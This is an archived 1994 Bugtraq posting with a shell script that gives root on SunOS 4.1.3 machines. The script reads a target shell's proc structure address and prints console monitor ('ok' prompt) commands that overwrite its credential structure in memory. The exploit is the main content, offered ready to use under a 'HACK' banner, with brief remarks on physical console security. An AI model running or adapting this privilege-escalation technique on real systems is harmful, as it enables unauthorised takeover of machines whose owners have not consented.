**************************************************************************
   HACK: Use monitor on console to poke holes in memory & obtain root
 System: Unix, Sun 4.1.3
 Source: Bugtraq
**************************************************************************

#!/bin/sh - 

# From: an100188@anon.penet.fi
# Subject: Breaking in from the monitor at the console
# Date: Fri, 27 May 1994 15:34:36 UTC
# To: bugtraq@crimelab.com
# 
# Breaking into a machine, typically a workstation, by using the monitor
# at the console to poke values into memory has always been possible.  I
# didn't realize how simple and unobtrusive it was before I saw this
# script.  This one is for Suns, but the principle applies to any
# machine with a console monitor.  On Sun4s there is some sort of
# "secure mode" that I presume lets you disable the monitor.  It is
# possible to change the L1-A sequence to another pair of keys, but if
# you own /dev/console you can change it back.  This obscurity may or
# may not be useful.
# 
# This particular attack needs a way to run the script on the machine,
# typically in a shell.  I presume there are other spots where you could
# tickle a machine that don't even require that.  Physically secure
# consoles prevent this attack.
# 
# Sigh.
#
# ----------------------------------------------------------------------------
#
# Subject: Re: Breaking in from the monitor at the console
# Date: Sat, 28 May 1994 10:15:52 UTC
# To: bugtraq@crimelab.com
# 
# Oops, someone pointed out that the script was deleted by the anonymous
# mail signature-remover.  Sorry about that.  Here's the script:
# 
# 
# 
# Program: fc-4.1.3
# Author: Anonymous
# Usage: fc-4.1.3 PID
#       PID is the PID of the shell you wish to give root to.
#
# Description:
#       Tell people how to give themselves root (on SunOS 4.1.3 machines)
#

# Give the program a known path
PATH="/bin:/usr/etc:/usr/ucb"
export PATH

if [ $1x = x ]; then 
cat - << EOF
Usage: $0 PID
        Where PID is the PID of the shell you want to give root to.

Note - for csh the PID is stored in \$\$.
EOF
        exit 1
fi

# This is the start of the proc structure for a given PID.
procp=`pstat -u $1 | grep procp | cut -f2`

# This is really the only important information here.
# This number is the offset of the pointer to the cred structure 
# in the proc structure.
ucred="4c"

cat - << EOF
On the console press '<L1>a', you should see then see the following message:
        Type  'go' to resume
        ok 

type the following at the 'ok' prompt:
        b 2 do 0 $procp $ucred + l@ i + w! 2 +loop
        go

Notes: 
        * On some sun keyboards the '<L1>' key is labeled 'Stop'.
        * There is Emacs style line editing available at the 'ok' prompt.
EOF

exit 0